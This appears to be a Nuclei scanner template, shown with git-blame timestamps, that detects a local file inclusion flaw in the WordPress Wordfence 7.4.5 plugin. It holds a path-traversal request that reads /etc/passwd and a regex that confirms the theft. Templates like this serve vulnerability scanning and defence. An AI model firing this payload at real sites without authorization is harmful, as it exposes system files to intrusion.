2021-07-12 09:45:23 +00:00
|
|
|
id: wordpress-wordfence-lfi
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-07-12 09:45:23 +00:00
|
|
|
info:
|
2022-07-29 14:04:23 +00:00
|
|
|
name: WordPress Wordfence 7.4.5 - Local File Inclusion
|
2021-07-12 09:45:23 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-07-29 14:04:23 +00:00
|
|
|
description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-12 09:45:23 +00:00
|
|
|
- https://www.exploit-db.com/exploits/48061
|
|
|
|
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
|
2022-07-29 14:04:23 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wordpress,wp-plugin,lfi,wordfence,edb
|
2021-07-12 09:45:23 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-12 09:45:23 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-07-29 14:04:23 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/29
|